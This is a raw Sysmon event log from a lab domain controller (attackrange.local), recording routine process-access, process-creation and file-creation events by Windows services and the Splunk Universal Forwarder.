10341000x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.735{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.737{59A5CD1D-9148-6005-4A02-00000000A301}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:48.672{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1380-0\System.Activities.DurableInstancing.dll2021-01-18 13:46:48.672 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.251{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.251{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.251{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9148-6005-4902-00000000A301}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.219{59A5CD1D-9148-6005-4802-00000000A301}32444588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 